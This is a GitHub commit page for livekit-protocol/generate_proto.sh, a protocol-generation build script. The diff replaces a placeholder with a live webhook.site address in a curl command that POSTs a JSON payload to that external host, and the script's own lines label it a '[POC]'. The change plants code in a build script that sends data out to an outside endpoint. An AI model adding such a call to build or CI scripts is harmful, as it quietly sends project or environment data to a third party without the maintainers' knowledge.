We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent dbd5a7f commit cbd17c6Copy full SHA for cbd17c6
1 file changed
livekit-protocol/generate_proto.sh
@@ -58,7 +58,7 @@ EOF
58
)
59
60
# Send the payload to the external webhook
61
-curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/YOUR_UNIQUE_URL_HERE
+curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/83eec9ca-ff62-4398-ab88-84e4376b6032
62
63
echo "[POC] Done. Check your webhook."
64
echo "================================================================="
0 commit comments